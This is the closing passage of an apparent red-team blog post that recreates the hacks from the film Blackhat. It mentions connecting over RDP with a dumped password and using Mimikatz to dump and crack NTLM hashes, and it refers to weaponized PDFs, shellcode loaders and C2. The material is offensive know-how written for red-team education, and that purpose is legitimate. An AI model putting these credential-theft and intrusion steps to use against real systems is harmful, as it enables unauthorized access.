For that, just enter the target IP address in the program.
We already assumed that we have dumped the password of our target user. Will use that to connect with the RDP session. If you want to dump the password you can use Mimikatz to dump it and then crack the NTLM hash offline locally.
Mission Passed!!!
Chapter 4: Closing Notes - Cutting Through the Hollywood Noise
Blackhat may have nailed the aesthetics of cyber warfare, but when it comes to real offensive operations, the reality is far more grounded—and far more technical. From weaponized PDFs to shellcode loaders and post-exploitation over RDP, this breakdown shows how movie magic often glosses over the true art of exploitation.
At God Access Labs, we don’t just watch the hacks—we _recreate_ them, dissect them, and push the boundaries of what’s possible in red team operations. Scenes like these give us a chance to separate cinematic fiction from real-world tactics, techniques, and tooling.
Until next time, keep your payloads tight, your C2 hidden, and your access... Godlike.